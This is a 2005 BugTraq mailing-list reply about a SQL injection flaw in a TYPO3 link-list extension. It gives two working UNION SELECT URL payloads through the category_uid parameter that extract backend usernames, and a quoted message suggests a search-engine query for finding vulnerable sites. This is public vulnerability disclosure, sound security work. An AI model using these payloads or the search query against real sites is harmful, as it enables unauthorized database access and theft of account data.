|
|
BugTraq
TYPO3 SQL Injection vunerabilitie Mar 03 2005 05:08PM Fabian Becker (neonomicus gmx de) (2 replies) Re: TYPO3 3rd party extension (cmw_linklist) SQL Injection vunerability Mar 04 2005 01:06PM Michael Shigorin (mike osdn org ua) Re: TYPO3 SQL Injection vunerabilitie Mar 03 2005 11:06PM Sebastian Wolfgarten (sebastian wolfgarten com) (2 replies) |
|
Privacy Statement |
doesn't pull the password, just the username :)
http://path/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%2
0use
rname%20FROM%20be_users%20WHERE%20uid=1/*
Also, it's easy to pull lists of data from the database using this
vulnerability since the query results are looped and displayed. Take the
following example. It would list usernames as categories
http://path/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%2
0use
rname,null%20FROM%20be_users%20WHERE%201/*
James
-----Original Message-----
From: Sebastian Wolfgarten [mailto:sebastian (at) wolfgarten (dot) com [email concealed]]
Sent: Thursday, March 03, 2005 5:07 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Re: TYPO3 SQL Injection vunerabilitie
Hi Dennis,
I am pretty sure Fabian (Neonomicus) meant *every link* (or site) generated
by
Typo3, didn't he? For instance if you search google for
"inurl:action=getviewcategory" I am pretty sure you will understand what he
meant (or am I wrong here)?
@Fabian (Neonomicus): Could you please provide more details about the
vulnerability you've discoveredl? By the way did you give the Typo3 guys
*enough* time to respond???
All the best,
Sebastian
--
No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.300 / Virus Database: 266.5.5 - Release Date: 3/1/2005
--
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.300 / Virus Database: 266.5.5 - Release Date: 3/1/2005
[ reply ]